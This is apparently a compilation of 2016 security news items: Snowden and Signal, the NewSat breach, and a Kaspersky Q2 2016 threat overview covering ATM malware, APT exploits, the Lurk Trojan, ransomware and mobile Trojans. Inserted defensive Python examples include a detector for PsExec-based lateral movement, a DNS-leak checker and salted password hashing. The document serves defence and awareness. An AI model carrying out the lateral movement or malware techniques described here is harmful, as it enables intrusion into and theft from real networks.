“Edward Snowden, who famously requires that people place their cell phones in a freezer before he agrees to meet with them in person (the freezer, or fridge, acts as a Faraday cage and blocks any N.S.A.-like snooping of people’s whereabouts), has touted the security of Signal numerous times, saying on Twitter, “I use Signal every day.””

Edward Snowden ✔ @Snowden
Report: Russia hijacking activist accounts via telcos.

Use Signal, and always do this: (http://support.whispersystems.org/hc/en-us/articles/213134107-How-do-I-verify-the-person-I-m-sending-messages-to-is-who-they-say-they-are- …) https://twitter.com/FredericJacobs/status/726128513695109120 …
12:55 - 30 Apr 2016
A few days after the DNC security breach was publicly disclosed, the DNC staffers received a memo containing detailed instructions on how to download and use the Signal app.

The use of the popular messaging app among DNC staffers is a clear sign of the need for a proper security posture among top political officials and the staffers who manage sensitive information.

If you want to take a look at the other secure messaging apps on the market, you can read the post I published here.

The network of satellite telco firm NewSat was the ‘most corrupted’ ever
29.8.2016 securityaffeirs Security

The network of the satellite firm NewSat was the ‘most corrupted’ ever: it was hacked by foreign hackers and had interception kit in its data centre.
The story demonstrates the high interest of spy agencies in hacking communication systems.

Once upon a time, the Australian satellite company was deeply hacked by cyber spies who completely corrupted its network. The company is now out of business; its assets were sold off last year after it went into administration.

According to a former staffer that has spoken on condition of anonymity to the Australian Broadcasting Corporation, it was ‘the most corrupted’ network the nation’s intelligence had encountered.

According to the ABC broadcast, the hack was already reported in 2013, when the company disclosed the security breach to the Australian Signals Directorate. The Chinese nation-state hackers made the organization “the most corrupted network [the Directorate] had ever seen”, the ABC reports.

Former Central Intelligence Agency chief Michael Hayden declared that China’s efforts against Australia aimed at “the theft of information, and really by and large the theft of information for commercial profit.”

According to the official, the hackers were interested in sensitive information such as the plans for a Lockheed Martin-designed satellite dubbed Jabiru-1.

“Given we were up against China, state-sponsored, a lot of money behind them and a lot of resources and we were only a very small IT team, it certainly wasn’t a fair fight for us,” Newsat’s former IT manager Daryl Peter said.

The issue made headlines because Newsat was planning to install a restricted encryption tool that allows the NSA to spy on satellite communications, so it notified the ASD of its intent.

The Australian Signals Directorate refused to release the encryption tool to Newsat until it was able to eradicate the intruders from its systems. Intelligence officials replied to the company, telling it that its networks were “the most corrupted” they had seen.

Australian satellite company Newsat Ltd was forced to rebuild its entire network in secret. (Four Corners)

Intelligence officials who examined the Newsat infrastructure confirmed it was “the most corrupted” they had seen.

“They actually said to us that we were the worst,” Mr Peter said.

“What came out of that meeting was we had a serious breach on our network and it wasn’t just for a small period of time, they’d been inside our network for a long period, so maybe about two years. And the way it was described to us was they are so deep inside our network it’s like we had someone sitting over our shoulder for anything we did.”

According to the anonymous source that has revealed the story to the ABC, the Newsat network was completely rebuilt.

Nevertheless, NewSat installed an Australian Government communications interception system in its data centre, but the Australian Government refused to deploy the restricted NSA encryption tool because of the security breach it had discovered.

“They (NewSat) had a lot of dealings with Middle East organisations,” the source said.

Let me suggest reading a detailed analysis published by the ABC’s Four Corners that confirms Australian Government computer networks were breached by hackers.

IT threat evolution in Q2 2016. Overview
29.8.2016 Safety

Targeted attacks and malware campaigns

Cha-ching! Skimming off the cream

Earlier in the year, as part of an incident response investigation, we uncovered a new version of the Skimer ATM malware. The malware, which first surfaced in 2009, has been re-designed. So too have the tactics of the cybercriminals using it. The new ATM infector has been targeting ATMs around the world, including the UAE, France, the United States, Russia, Macau, China, the Philippines, Spain, Germany, Georgia, Poland, Brazil and the Czech Republic.

Rather than the well-established method of fitting a fake card-reader to the ATM, the attackers take control over the whole ATM. They start by installing the Skimer malware on the ATM – either through physical access or by compromising the bank’s internal network. The malware infects the ATM’s core – the part of the device responsible for interaction with the wider bank infrastructure, card processing and dispensing of cash. In contrast to a traditional card skimmer, there are no physical signs that the ATM is infected, leaving the attackers free to capture data from cards used at the ATM (including a customer’s bank account number and PIN) or steal cash directly.

The cybercriminal ‘wakes up’ the infected ATM by inserting a card that contains specific records on the magnetic stripe. After reading the card, Skimer is able to execute a hard-coded command, or receive commands through a special menu activated by the card. The Skimer user interface appears on the display only after the card is ejected and only if the cybercriminal enters the correct session key within 60 seconds. The menu offers 21 different options, including dispensing money, collecting details of cards that have been inserted in the ATM, self-deletion and performing updates. The cybercriminal can save card details on the chip of their card, or print the details it has collected.

The attackers are careful to avoid attracting attention. Rather than take money directly from the ATM – which would be noticed immediately – they wait (sometimes for several months) before taking action. In most cases, they collect data from skimmed cards in order to create cloned cards later. They use the cloned cards in other, non-infected ATMs, casually withdrawing money from the accounts of the victims in a way that can’t be linked back to the compromised ATM.

Kaspersky Lab has several recommendations to help banks protect themselves. They should carry out regular anti-virus scans; employ whitelisting technologies; apply a good device management policy; make use of full disk encryption; password protect the BIOS of ATMs; enforce hard disk booting and isolate the ATM network from the rest of the bank infrastructure. The magnetic strip of the card used by the cybercriminals to activate the malware contains nine hard-coded numbers. Banks may be able to proactively look for these numbers within their processing systems: so we have shared this information, along with other Indicators of Compromise (IoCs).

In April, one of our experts provided an in-depth examination of ATM jackpotting and offered some insights into what should be done to secure these devices.

New attacks, old exploit

In recent months we have been tracking a wave of cyber-espionage attacks conducted by different APT groups across the Asia-Pacific and Far East regions. They all share one common feature: they exploit the CVE-2015-2545 vulnerability. This flaw enables an attacker to execute arbitrary code using a specially crafted EPS image file. It uses PostScript and can evade the Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP) protection methods built into Windows. The Platinum, APT16, EvilPost and SPIVY groups were already known to use this exploit. More recently, it has also been used by the Danti group.

Danti, first identified in February 2016 and still active, is highly focused on diplomatic bodies. The group predominantly targets Indian government organizations, but data from the Kaspersky Security Network (KSN) indicates that it has also infected targets in Kazakhstan, Kyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines.

The exploit is delivered using spear-phishing e-mails spoofed to look as though they have been sent by high-ranking Indian government officials. When the victim clicks on the attached DOCX file, the Danti backdoor is installed, allowing the attackers to capture sensitive data.

The origin of the Danti group is unclear, but we suspect that it might be connected to the NetTraveler and DragonOK groups: it’s thought that Chinese-speaking hackers are behind these attacks.

Kaspersky Lab has also seen another campaign that makes use of the CVE-2015-2545 vulnerability: we’ve called this SVCMONDR after the Trojan that is downloaded once the attackers get a foothold in the victim’s computer. This Trojan is different from the one used by the Danti group, but it shares some common features with Danti and with APT16 – the latter is a cyber-espionage group believed to be of Chinese origin.

One of the most striking aspects of these attacks is that they are successfully making use of a vulnerability that was patched by Microsoft in September 2015. In November, we predicted that APT campaigns would invest less effort in developing sophisticated tools and make greater use of off-the-shelf malware to achieve their goals. This is a case in point: using a known vulnerability, rather than developing a zero-day exploit. This underlines the need for companies to pay more attention to patch management to secure their IT infrastructure.

New attack, new exploit

Of course, there will always be APT groups that seek to take advantage of zero-day exploits. In June, we reported on a cyber-espionage campaign – code-named ‘Operation Daybreak’ and launched by a group named ScarCruft – that uses a previously unknown Adobe Flash Player exploit (CVE-2016-1010). This group is relatively new and has so far managed to stay under the radar. We think the group might have previously deployed another zero-day exploit (CVE-2016-0147) that was patched in April.

The group have targeted a range of organizations in Russia, Nepal, South Korea, China, India, Kuwait and Romania. These include an Asian law enforcement agency, one of the world’s largest trading companies, a mobile advertising and app monetization company in the United States, individuals linked to the International Association of Athletics Federations and a restaurant located in one of Dubai’s top shopping centres. The attacks started in March 2016: since some of them are very recent, we believe that the group is still active.

The exact method used to infect victims is unclear, but we think that the attackers use spear-phishing e-mails that point to a hacked website hosting the exploit. The site performs a couple of browser checks before redirecting victims to a server controlled by the hackers in Poland. The exploitation process consists of three Flash objects. The one that triggers the vulnerability in Adobe Flash Player is located in the second SWF file delivered to the victim. At the end of the exploitation chain, the server sends a legitimate PDF file, called ‘china.pdf’, to the victim: this seems to be written in Korean.

The attackers use a number of interesting methods to evade detection, including exploiting a bug in the Windows Dynamic Data Exchange (DDE) component in order to bypass security solutions – a method not seen before. This flaw has been reported to Microsoft.

Flash Player exploits are becoming rare, because in most cases they need to be coupled with a sandbox bypass exploit – this makes them tricky to do. Moreover, although Adobe is planning to drop Flash support soon, it continues to implement new mitigations to make exploitation of Flash Player increasingly difficult. Nevertheless, resourceful groups such as ScarCruft will continue to try and find zero-day exploits to target high-profile victims.

While there’s no such thing as 100 per cent security, the key is to increase security defences to the point that it becomes so expensive for an attacker to breach them that they give up or choose an alternative target. The best defence against targeted attacks is a multi-layered approach that combines traditional anti-virus technologies with patch management, host-based intrusion prevention and a default-deny whitelisting strategy. According to a study by the Australian Signals Directorate, 85 per cent of targeted attacks analysed could have been stopped by employing four simple mitigation strategies: application whitelisting, updating applications, updating operating systems and restricting administrative privileges.

Kaspersky Lab products detect the Flash exploit as ‘HEUR:Exploit.SWF.Agent.gen’. The attack is also blocked proactively by our Automatic Exploit Prevention (AEP) component. The payloads are detected as ‘HEUR:Trojan.Win32.ScarCruft.gen’.

XDedic: APT-as-a-Service

Kaspersky Lab recently investigated an active cybercriminal trading platform called xDedic, an online black market for hacked server credentials around the world – all available through the Remote Desktop Protocol (RDP). We initially thought that this market extended to 70,000 servers, but new data suggests that the XDedic market is much wider – including credentials for 176,000 servers. XDedic includes a search engine, enabling potential buyers to find almost anything – from government and corporate networks – for as little as $8 per server. This low price provides ‘customers’ with access to data on such servers and their use as a bridgehead for further targeted attacks.

The owners of the ‘xdedic[.]biz’ domain claim that they have no relation to those selling access to hacked servers – they are simply selling a secure trading platform for others. The XDedic forum has a separate sub-domain, ‘partner[.]xdedic[.]biz’, for the site’s ‘partners’ – that is, those selling hacked servers. The XDedic owners have developed a tool that automatically collects information about the system, including websites available, software installed and more. They also provide other tools to their partners, including a patch for RDP servers to support multiple logins for the same user and proxy installers.

The existence of underground markets is not new. But we are seeing a greater level of specialisation. And while the model adopted by the XDedic owners isn’t something that can be replicated easily, we think it’s likely that other specialized markets will appear in the future.

Data from KSN helped us identify several files that were downloaded from the XDedic partner portal: Kaspersky Lab products detect these files as malicious. We have also blacklisted the URLs of control servers used for gathering information about the infected systems. Our detailed report on XDedic contains more information on hosts and network-based IoCs.

Lurking around the Russian Internet

Sometimes our researchers find malware that is particular about where it infects. On the closed message boards used by Russian cybercriminals, for example, you sometimes see the advice ‘Don’t work with RU’ – offered by experienced criminals to the younger generation: i.e. don’t infect Russian computers, don’t steal money from Russians and don’t use them to launder money. There are two good reasons for this. First, online banking is not as common as it is in the west. Second, victims outside Russia are unlikely to lodge a complaint with the Russian police – assuming, of course, that they even know that Russian cybercriminals are behind the malware that has infected them.

But there are exceptions to every rule. One of these is the Lurk banking Trojan that has been used to steal money from victims in Russia for several years. The cybercriminals behind Lurk are interested in telecommunications companies, mass media and news aggregators and financial institutions. The first provide them with the means to transfer traffic to the attackers’ servers. The news sites provide them with a way to infect a large number of victims in their ‘target audience’ – i.e. the financial sector. The Trojan’s targets appear to include Russia’s four largest banks.

The primary method used to spread the Lurk Trojan is drive-by download, using the Angler exploit pack: the attackers place a link on compromised websites that leads to a landing page containing the exploit. Exploits (including zero-days) are typically implemented in Angler before being used in other exploit packs, making it particularly dangerous. The attackers also distribute code through legitimate websites, where infected files are served to visitors from the .RU zone, but others receive clean files. The attackers use one infected computer in a corporate network as a bridgehead to spread across the organization. They use the legitimate PsExec utility to distribute the malware to other computers; and then use a mini-dropper to execute the Trojan’s main module on the additional computers.
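The bridgehead-to-workstations step described above leaves a recognisable trace on every target: PsExec installs a temporary service on the remote host, which Windows records as a service-installation event. The following is an added detection example, not Kaspersky Lab’s code; the event records are constructed, simplified renderings of System log event 7045, and the field names used for them are assumptions.

```python
"""Spot PsExec-style lateral movement in Windows service-installation events.

Added example, not Kaspersky Lab's code. The records below are constructed,
simplified renderings of System log event 7045 ("A service was installed in
the system"), not real telemetry; the field names are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# The stock PsExec service is named PSEXESVC and its binary is copied into the
# Windows directory of the remote host; a renamed copy keeps the same shape.
PSEXEC_SERVICE = re.compile(r"^PSEXESVC", re.IGNORECASE)

# Constructed sample: (timestamp, host where the service was installed, event id, fields)
SAMPLE_EVENTS = [
    ("2016-05-12T09:01:10", "WS-ACCT-07", 7045,
     {"ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe", "Account": "CORP\\jdoe"}),
    ("2016-05-12T09:01:25", "WS-ACCT-12", 7045,
     {"ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe", "Account": "CORP\\jdoe"}),
    # Renamed service pushed by the same account moments later
    ("2016-05-12T09:01:40", "WS-ACCT-19", 7045,
     {"ServiceName": "upd-7f3a", "ImagePath": "%SystemRoot%\\upd-7f3a.exe", "Account": "CORP\\jdoe"}),
    # Ordinary software install by a local administrator: should not be flagged
    ("2016-05-12T10:30:00", "WS-DEV-03", 7045,
     {"ServiceName": "Apache2.4", "ImagePath": "C:\\Apache24\\bin\\httpd.exe", "Account": "WS-DEV-03\\Administrator"}),
    # One-off PsExec use by the helpdesk: a single install, no fan-out
    ("2016-05-12T14:00:00", "WS-HR-02", 7045,
     {"ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe", "Account": "CORP\\helpdesk"}),
]


def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%S")


def psexec_installs(events):
    """Hosts where the default-named PsExec service was installed, with the installing account."""
    return [(host, fields["ServiceName"], fields["Account"])
            for _, host, event_id, fields in events
            if event_id == 7045 and PSEXEC_SERVICE.match(fields["ServiceName"])]


def service_fanout(events, window=timedelta(minutes=5), min_hosts=3):
    """Accounts that installed services on at least `min_hosts` distinct hosts
    inside one `window`. This catches the bridgehead pattern regardless of the
    service name, so a renamed PsExec service is still noticed."""
    by_account = defaultdict(list)
    for ts, host, event_id, fields in events:
        if event_id == 7045:
            by_account[fields["Account"]].append((parse_ts(ts), host))
    hits = {}
    for account, installs in by_account.items():
        installs.sort()
        for i, (start, _) in enumerate(installs):
            hosts = {h for t, h in installs[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                hits[account] = sorted(hosts)
                break
    return hits


if __name__ == "__main__":
    for host, svc, acct in psexec_installs(SAMPLE_EVENTS):
        print(f"PsExec service {svc} installed on {host} by {acct}")
    for acct, hosts in service_fanout(SAMPLE_EVENTS).items():
        print(f"{acct} pushed services to {len(hosts)} hosts within 5 minutes: {hosts}")
```

A single PsExec service install is often legitimate administration (the helpdesk record above), so the stronger signal is the fan-out: one account creating services on several machines within minutes, which is what a bridgehead spreading a dropper looks like whatever the service is called.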

There are a number of interesting features of the Lurk Trojan. One distinct feature that we discussed soon after it first appeared is that it is ‘file-less’ malware, i.e. it exists only in RAM and doesn’t write its code to the hard drive.

The Trojan is also set apart because it is highly targeted. The authors do their best to ensure that they infect victims that are of interest to them without catching the attention of analysts or researchers. The incidents known to us suggest Lurk is successful at what it was designed for: we regularly receive reports of thefts from online banking systems; and forensic investigations after the incidents reveal traces of Lurk on the affected computers.

Malware stories

Cybercriminals get ready for Rio

Fraudsters are always on the lookout for opportunities to make money off the back of major sporting events, so it’s no surprise that we’ve seen an increase in cybercriminal activity related to the forthcoming Olympic Games in Brazil.

We’ve seen an increase in spam e-mails. The spammers try to cash in on people’s desire to watch the games live, sending out messages informing the recipient that they have won a (fake) lottery (supposedly organized by the International Olympic Committee and the Brazilian government): all they need to do to claim their tickets is to reply to the e-mail and provide some personal details.

Some messages point to fake websites, like this one offering direct sale of tickets without the need to make an application to the official lottery:

These fake ticketing sites are very convincing. Some fraudsters go the extra mile by obtaining legitimate SSL certificates to provide a secure connection between the victim’s browser and the site – displaying ‘https’ in the browser address bar to lure victims into a false sense of security. The scammers inform their victims that they will receive their tickets two or three weeks before the event, so the victim doesn’t become suspicious until it’s too late and their card details have been used by the cybercriminals. Kaspersky Lab is constantly detecting and blocking new malicious domains, many of which include ‘rio’ or ‘rio2016’ in the title.

It’s too late to buy tickets through official channels, so the best way to see the games is to watch on TV or online. We advise everyone to beware of malicious streaming websites – probably the last-ditch attempt by cybercriminals to scam people out of their money.

Cybercriminals also take advantage of our desire to stay connected wherever we go – to share our pictures, to update our social network accounts, to find out the latest news or to locate the best places to eat, shop or stay. Unfortunately, mobile roaming charges can be very high, so often people look for the nearest Wi-Fi access point. This is dangerous, because data sent and received over an open Wi-Fi network can be intercepted. So passwords, PINs and other sensitive data can be stolen easily. On top of this, cybercriminals also install fake access points, configured to direct all traffic through a host that can be used to control it – even functioning as a ‘man-in-the-middle’ device that is able to intercept and read encrypted traffic.

To gauge the extent of the problem, we drove by three major Rio 2016 locations and passively monitored the available Wi-Fi networks that visitors are most likely to try to use during their stay – the Brazilian Olympic Committee building, the Olympic Park and the Maracana, Maracanazinho and Engenhao stadiums. We were able to find around 4,500 unique access points. Most are suitable for multimedia streaming. But around a quarter of them are configured with weak encryption protocols: this means that attackers can use them to sniff the data of unsuspecting visitors that connect to them.

To reduce your exposure, we would recommend any traveller (not just those who plan to visit Rio!) to use a VPN connection, so that data from your device travels to the Internet through an encrypted data channel. Be careful though. Some VPNs are vulnerable to DNS leak attacks – meaning that, although your immediate sensitive data is sent via the VPN, your DNS requests are sent in plain text to the DNS servers set by the access point hardware. This would allow an attacker to see what you’re browsing and, if they have access to the compromised Wi-Fi network, define malicious DNS servers – i.e. letting them redirect you from a legitimate site (your bank, for example) to a malicious site. If your VPN provider doesn’t support its own DNS servers, consider an alternative provider or a DNSCrypt service.
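The DNS leak described above can be checked for on the device itself: a leak exists whenever the resolver list contains a server that is neither the one the VPN pushed nor an address routed through the tunnel. The following is an added example, not Kaspersky Lab’s code; the resolver file, the VPN-pushed DNS server and the tunnel range are constructed sample values standing in for /etc/resolv.conf and the VPN client’s own settings.

```python
"""Find resolvers that would carry DNS queries outside a VPN tunnel.

Added example, not Kaspersky Lab's code. The resolver file, the DNS servers
pushed by the VPN and the tunnel address range are all constructed sample
values; on a real machine you would read /etc/resolv.conf (or the output of
your resolver manager) and the VPN client's own settings instead.
"""
import ipaddress

# Constructed /etc/resolv.conf as left behind by a VPN that added its own
# resolver but did not remove the one handed out by the hotspot's DHCP.
SAMPLE_RESOLV_CONF = """\
# Generated by NetworkManager (constructed sample)
search lan
nameserver 10.8.0.1
nameserver 192.168.43.1
nameserver not-an-address
"""

SAMPLE_VPN_DNS = ["10.8.0.1"]                        # resolver(s) the VPN pushed
SAMPLE_TUNNEL = ipaddress.ip_network("10.8.0.0/24")  # addresses routed through the tunnel


def parse_nameservers(text):
    """Return the IP addresses of every valid `nameserver` line, in order."""
    servers = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            try:
                servers.append(ipaddress.ip_address(parts[1]))
            except ValueError:
                continue                            # malformed entry, ignore
    return servers


def classify_resolvers(text, vpn_dns, tunnel):
    """Split resolvers into those served via the tunnel, local stubs that
    need a second look (their upstreams are configured elsewhere), and
    resolvers reached over the raw Wi-Fi link, i.e. leaks."""
    vpn = {ipaddress.ip_address(a) for a in vpn_dns}
    result = {"tunnel": [], "stub": [], "leak": []}
    for server in parse_nameservers(text):
        if server in vpn or server in tunnel:
            result["tunnel"].append(str(server))
        elif server.is_loopback:
            result["stub"].append(str(server))
        else:
            result["leak"].append(str(server))
    return result


def dns_leaks(text, vpn_dns, tunnel):
    """True when at least one resolver is reachable only outside the tunnel."""
    return bool(classify_resolvers(text, vpn_dns, tunnel)["leak"])


if __name__ == "__main__":
    report = classify_resolvers(SAMPLE_RESOLV_CONF, SAMPLE_VPN_DNS, SAMPLE_TUNNEL)
    print(report)
    print("DNS leak:", dns_leaks(SAMPLE_RESOLV_CONF, SAMPLE_VPN_DNS, SAMPLE_TUNNEL))
```

A loopback entry such as a local stub resolver is reported separately because the file does not say where that stub forwards queries; its per-interface upstreams have to be inspected with the resolver manager’s own tooling. This check only looks at configuration: a resolver with a tunnel address still depends on the routing table actually sending it through the VPN.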

There’s one other thing that we need if we want to stay connected – electricity: we need to keep our mobile devices charged. Today you can find charging-points in shopping centres, airports and even taxis. Typically they provide connectors for leading phone models, as well as a USB connector that a visitor can use with their own cable. Some also provide a traditional power supply that can be used with a phone charger.

But remember that you don’t know what’s connected to the other end of the USB connector. If an attacker compromises the charging-point, they can execute commands that allow them to obtain information about your device, including the model, IMEI number, phone number and more: information they can use to run a device-specific attack that would then enable them to infect the device. You can find more information about the data that’s transmitted when you connect a device using USB and how an attacker could use it to compromise a mobile device.

This doesn’t mean that you shouldn’t charge your device when you’re away from home. But you should take steps to protect yourself. It’s always best to use your own charger, rather than using charging cables at a public charging-point or buying one from an unknown source. You should also use a power outlet, instead of a USB socket.

Cybercriminals also continue to exploit established ways to make money. This includes using ATM skimmers to steal credit card data. The most basic skimmers install a card reader and a camera to record the victim’s PIN. The best way to protect yourself from this is to cover the keypad as you enter your PIN. However, sometimes cybercriminals replace the whole ATM, including the keypad and screen, in which case the typed password is stored on the fake ATM system. So it’s also important to check the ATM before you insert your card. Check to see if the green light on the card reader is on: typically, they replace the card reader with a version where there is no light, or it’s switched off. Also check the machine to see if there is anything suspicious, such as missing or broken parts.

Card cloning is another problem facing visitors to Rio 2016. While chip-and-PIN makes life harder for cybercriminals, it’s possible for them to exploit flaws in the EMV transaction implementation. It’s difficult to protect yourself against this type of attack, because usually the point-of-sale is modified in order to save the data – to be collected later by the cybercriminals. Sometimes they don’t need physical access to extract the stolen data, as they collect it via Bluetooth. However, there are some steps you can take to reduce your exposure to this type of attack. Sign up for SMS notifications of card transactions from your bank, if they provide this service. Never give your card to the retailer: if they can’t bring the machine to you, go to the machine. If the device looks suspicious, use a different payment method. Before typing your PIN, make sure you’re on the card payment screen and ensure that your PIN isn’t going to be displayed on the screen.

Ransomware: backup or pay up?

Towards the end of last year, we predicted that ransomware would gain ground on banking Trojans – for the attackers, ransomware is easily monetized and involves a low cost per victim. So it’s no surprise that ransomware attacks are increasing. Kaspersky Lab products blocked 2,315,931 ransomware attacks between April 2015 and April 2016 – that’s an increase of 17.7 per cent on the previous year. The number of cryptors (as distinct from blockers) increased from 131,111 in 2014-15 to 718,536 in 2015-16. Last year, 31.6 per cent of all ransomware attacks were cryptors. You can find further information, including an overview of the development of ransomware, in our KSN Report: PC ransomware in 2014-16.

Most ransomware attacks are directed at consumers – 6.8 per cent of attacks in 2014-15 and 13.13 per cent in 2015-16 targeted the corporate sector.

However, the figures are different for cryptors: throughout the 24 months covered by the report, around 20 per cent of cryptor attacks targeted the corporate sector.

Hardly a month goes by without reports of ransomware attacks in the media – including recent reports of a hospital and online casino falling victim to ransomware attacks. Yet while public awareness of the problem is growing, it’s clear that consumers and organizations alike are not doing enough to combat the threat; and cybercriminals are capitalizing on this – this is clearly reflected in the number of attacks we’re seeing.

It’s important to reduce your exposure to ransomware (and we’ve outlined important steps you can take here and here). However, there’s no such thing as 100 per cent security, so it’s also important to mitigate the risk. In particular, it’s vital to ensure that you have a backup, to avoid facing a situation where the only choices are to pay the cybercriminals or lose your data. It’s never advisable to pay the ransom. Not only does this validate the cybercriminals’ business model, but there’s no guarantee that they will decrypt your data once you’ve paid them – as one organization discovered recently to its cost. If you do find yourself in a situation where your files are encrypted and you don’t have a backup, ask if your anti-malware vendor is able to help. Kaspersky Lab, for example, is able to help recover data encrypted by some ransomware.

Mobile malware

Displaying adverts remains one of the main methods of monetization for detected mobile objects. Trojan.AndroidOS.Iop.c became the most popular mobile Trojan in Q2 2016, accounting for more than 10% of all detected mobile malware encountered by our users during the reporting period. It displays adverts and installs, usually secretly, various programs using superuser privileges. Such activity quickly renders the infected device virtually unusable due to the amount of adverts and new applications on it. Because this Trojan can gain superuser privileges, it is very difficult to delete the programs that it installs.

In our report IT threat evolution in Q1 2016 we wrote about the Trojan-Banker.AndroidOS.Asacub family of banking malware. Representatives of this family have an unusual technique for bypassing the security mechanisms used by operating systems – they overlay the regular system window requesting device administrator privileges with their own window containing buttons. The Trojan thereby conceals the fact that it is gaining elevated privileges in the system, and tricks the user into approving these privileges. In Q2 2016, Asacub introduced yet another method for deceiving users: the Trojan acquired SMS messenger functionality and started offering its services in place of the device’s standard SMS app.

Dialog window of Trojan-Banker.AndroidOS.Asacub.i asking for the rights to be the main SMS application

This allows the Trojan to bypass system constraints first introduced in Android 4.4 as well as delete or hide incoming SMSs from the user.

Back in October 2015, we wrote about representatives of the Trojan-PSW.AndroidOS.MyVk family that steal passwords from user accounts on the VK.com social network. This quarter, those responsible for distributing Trojans from this family introduced a new approach for bypassing Google Play security mechanisms that involved first publishing an app containing useful functionality with no malicious code. Then, at least once, they updated it with a new version of the application – still without any malicious code. It was more than a month after the initial publication that the attackers eventually added malicious code to an update. As a result, thousands of users downloaded Trojan-PSW.AndroidOS.MyVk.i.

Data breaches

Personal information is a valuable commodity, so it’s no surprise that cybercriminals target online providers, looking for ways to bulk-steal data in a single attack. We’ve become accustomed to the steady stream of security breaches reported in the media. This quarter has been no exception, with reported attacks on beautifulpeople.com, the nulled.io hacker forum (underlining the fact that it’s not just legitimate systems that are targeted), kiddicare, Tumblr and others.

Some of these attacks resulted in the theft of huge amounts of data, highlighting the fact that many companies are failing to take adequate steps to defend themselves. It’s not simply a matter of defending the corporate perimeter. There’s no such thing as 100 per cent security, so it’s not possible to guarantee that systems can’t be breached. But any organization that holds personal data has a duty of care to secure it effectively. This includes hashing and salting customer passwords and encrypting other sensitive data.

Consumers can limit the damage of a security breach at an online provider by ensuring that they choose passwords that are unique and complex: an ideal password is at least 15 characters long and consists of a mixture of letters, numbers and symbols from the entire keyboard. As an alternative, people can use a password manager application to handle all this for them automatically. Unfortunately, all too often people use easy-to-guess passwords and re-use the same password for multiple online accounts – so that if the password for one is compromised, all the victim’s online IDs are vulnerable. This issue was highlighted publicly in May 2016 when a hacker known as ‘Peace’ attempted to sell 117 million LinkedIn e-mails and passwords that had been stolen some years earlier. More than one million of the stolen passwords were ‘123456’!
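The two provider-side and user-side measures above (salted password hashing, and passwords that are long and drawn from several character classes) can be shown together. The following is an added example, not Kaspersky Lab’s code and not any named provider’s implementation; it uses only the Python standard library and the sample passwords are constructed. The unsalted digest is included only to show why identical passwords in a breach dump become visible as identical hashes.

```python
"""Salted, slow password hashing versus a bare digest, plus the password
policy from the text (15+ characters drawn from several character classes).

Added example, not Kaspersky Lab's code. Uses only the Python standard
library; the sample passwords are constructed.
"""
import hashlib
import hmac
import os

ITERATIONS = 100_000   # PBKDF2 work factor; raise as hardware gets faster


def unsalted_digest(password):
    """What NOT to do: identical passwords give identical hashes, so one
    cracked hash (or a precomputed table) unlocks every account sharing it."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def hash_password(password, salt=None):
    """Return a self-describing record: pbkdf2_sha256$iterations$salt$hash."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, record):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    scheme, iterations, salt_hex, digest_hex = record.split("$")
    if scheme != "pbkdf2_sha256":
        raise ValueError("unsupported scheme")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def meets_policy(password, min_length=15):
    """The policy stated above: at least 15 characters, mixing letters,
    digits and symbols (upper and lower case both required here)."""
    classes = (
        any(c.islower() for c in password),
        any(c.isupper() for c in password),
        any(c.isdigit() for c in password),
        any(not c.isalnum() and not c.isspace() for c in password),
    )
    return len(password) >= min_length and all(classes)


def duplicate_hashes(records):
    """Number of stored values equal to an earlier stored value. Non-zero
    only when salts are missing: a count of identical '123456' hashes in a
    breach dump is exactly this kind of collision."""
    seen, dupes = set(), 0
    for value in records:
        if value in seen:
            dupes += 1
        seen.add(value)
    return dupes


if __name__ == "__main__":
    users = ["123456", "123456", "correct-Horse-7-battery!"]   # constructed
    print("unsalted duplicates:", duplicate_hashes(unsalted_digest(p) for p in users))
    print("salted duplicates:  ", duplicate_hashes(hash_password(p) for p in users))
    rec = hash_password("correct-Horse-7-battery!")
    print(verify_password("correct-Horse-7-battery!", rec), verify_password("123456", rec))
    print(meets_policy("123456"), meets_policy("correct-Horse-7-battery!"))
```

The record stores its own salt and iteration count, so the work factor can be raised later and old records re-hashed at next login; `hmac.compare_digest` avoids leaking how many bytes of the digest matched through timing.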

Many online providers offer two-factor authentication – i.e. requiring customers to enter a code generated by a hardware token, or one sent to a mobile device, in order to access a site, or at least in order to make changes to account settings. Two-factor authentication certainly enhances security – if people choose to take advantage of it.

Several companies are hoping to replace passwords altogether. Apple allows fingerprint authorization for iTunes purchases and payments using Apple Pay. Samsung has said it will introduce fingerprint, voice and iris recognition for Samsung Pay. Amazon has announced ‘selfie-pay’. MasterCard and HSBC have announced the introduction of facial and voice recognition to authorize transactions. The chief benefit, of course, is that it replaces something that customers have to remember (a password) with something they have – with no opportunity to short-circuit the process (as they do when they choose a weak password).

Biometrics are seen by many as the way forward. However, they are not a security panacea. Biometrics can be spoofed, as we’ve discussed before (here, here and here); and biometric data can be stolen. In the end, multi-factor authentication is essential – combining something you know, something you have and something you are.

Malware was found in Iranian petrochemical complexes, but it’s not linked to recent incidents

29.8.2016 Virus

The head of Iran’s civilian defense confirmed that malware was found in petrochemical complexes, but that it did not cause the fires under investigation.
Last week, I reported the news related to a series of fires at Iranian petrochemical plants. Iran’s Supreme National Cyberspace Council started an investigation to discover whether the fires at oil and petrochemical facilities were caused by cyber attacks. Authorities fear that nation-state actors may have launched an attack similar to Stuxnet.

Mr. Abolhassan Firouzabadi, the secretary of Iran’s Supreme National Cyberspace Council, announced that a team of cyber experts will be involved in the investigation to understand if the incidents are linked and if they were caused by cyber attacks.

Fires at petrochemical complexes in Iran (image). Source: Tehrantimes.com

